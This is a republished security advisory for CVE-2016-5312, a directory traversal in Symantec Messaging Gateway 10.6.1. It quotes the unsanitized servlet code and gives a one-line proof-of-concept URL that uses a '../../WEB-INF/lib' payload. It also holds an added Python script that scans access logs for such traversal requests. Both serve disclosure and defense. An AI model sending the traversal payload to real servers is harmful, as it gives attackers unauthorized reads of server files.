Symantec Messaging Gateway <= 10.6.1 Directory Traversal

2016.09.29
Credit: R-73eN
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#

The problem lies in the package kavachart-kcServlet-5.3.2.jar, file: com/ve/kavachart/servlet/ChartStream.java

The vulnerable code is:

    extends HttpServlet {
        public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
            block6 : {
                try {
                    // Takes the "sn" parameter and stores it in the variable "string".
                    String string = httpServletRequest.getParameter("sn");
                    if (string == null) break block6;
                    String string2 = string.substring(string.length() - 3);
                    // "string" is passed here without any sanitization for directory traversal,
                    // and you can successfully use this to do a directory traversal.
                    byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
                    if (arrby != null) {
                        httpServletResponse.setContentType("image/" + string2);
                        ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                        httpServletResponse.setContentLength(arrby.length);
                        servletOutputStream.write(arrby);
                        this.getServletContext().removeAttribute(string);
                        break block6;
                    }

POC:

https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
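
Added example, not part of the original advisory or of Symantec's code: a log check that finds requests to the ChartStream servlet whose "sn" parameter carries path-traversal markers, for reviewing whether an unpatched control center was probed. The combined access-log format, the sample lines, and the rule that a legitimate chart id contains no "..", path separator or NUL byte are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Servlet path as it appears in the advisory's PoC URL.
SERVLET = "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"
# Request line of a combined-format access log entry (assumed log format).
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate chart id never holds "..", a path separator or NUL.
TRAVERSAL_RE = re.compile(r"\.\.|[/\\]|\x00")

# Constructed sample lines (documentation addresses, made-up ids and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Sep/2016:10:01:02 +0000] "GET ' + SERVLET + '?sn=chart1234png HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Sep/2016:10:05:40 +0000] "GET ' + SERVLET + '?sn=../../WEB-INF/lib HTTP/1.1" 200 812',
    '192.0.2.44 - - [28/Sep/2016:10:05:43 +0000] "GET ' + SERVLET + '?sn=..%2F..%2FWEB-INF%2Flib HTTP/1.1" 200 812',
    '192.0.2.10 - - [28/Sep/2016:10:06:00 +0000] "GET /brightmail/index.html HTTP/1.1" 200 900',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, since logs may hold encoded values."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_sn(log_line):
    """Return the decoded 'sn' of a ChartStream request that carries
    traversal markers, or None for any other line."""
    match = REQ_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    path = fully_decode(url.path).split(";")[0].rstrip("/")
    if path != SERVLET:
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("sn", []):
        sn = fully_decode(raw)
        if TRAVERSAL_RE.search(sn):
            return sn
    return None

def scan(lines):
    """Return (line_number, decoded_sn) for every suspicious request."""
    return [(n, sn) for n, line in enumerate(lines, 1)
            if (sn := suspicious_sn(line)) is not None]

if __name__ == "__main__":
    for n, sn in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious sn={sn!r}")
```

A hit with a 200 status and a non-zero response size deserves follow-up, since the servlet only writes a body when the lookup returned data.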

References:

https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00


Copyright 2019, cxsecurity.com

 
